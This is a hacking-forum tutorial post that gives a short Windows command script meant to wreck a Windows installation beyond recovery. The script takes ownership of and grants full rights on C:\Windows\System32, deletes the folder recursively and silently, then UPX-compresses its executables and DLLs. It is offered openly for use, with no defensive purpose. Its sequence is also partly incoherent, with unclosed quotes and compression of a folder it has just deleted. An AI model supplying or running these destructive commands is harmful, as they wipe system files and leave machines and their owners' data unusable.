![]() |
|
[Noob Tutorial] How to damage a Windows install and make it unrecoverable! - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Hacking (https://sinister.ly/Forum-Hacking) +--- Forum: Tutorials (https://sinister.ly/Forum-Tutorials) +--- Thread: [Noob Tutorial] How to damage a Windows install and make it unrecoverable! (/Thread-Noob-Tutorial-How-to-damage-a-Windows-install-and-make-it-unrecoverable) |
[Noob Tutorial] How to damage a Windows install and make it unrecoverable! - hacxx - 05-18-2021 The idea here is to damage a Windows install and make it unrecoverable. Since i couldn't find a simple one way crypter than i use upx. REQUIRE ADMIN PRIVILEGES AND NEED UPX Code: takeown /R /A /F C:\Windows\System32 /D N
icacls C:\Windows\System32 /grant Administrators:F /T /C
rd /s /q C:\Windows\system32
upx.exe -9 "C:\Windows\System32\*.exe
upx.exe -9 "C:\Windows\System32\*.dllThe code above will remove system privileges in C:\Windows\System32 and compress all exes and dlls not being used by the system. This will make C:\Windows\System32 smaller and unusable specially if compressing the dlls. |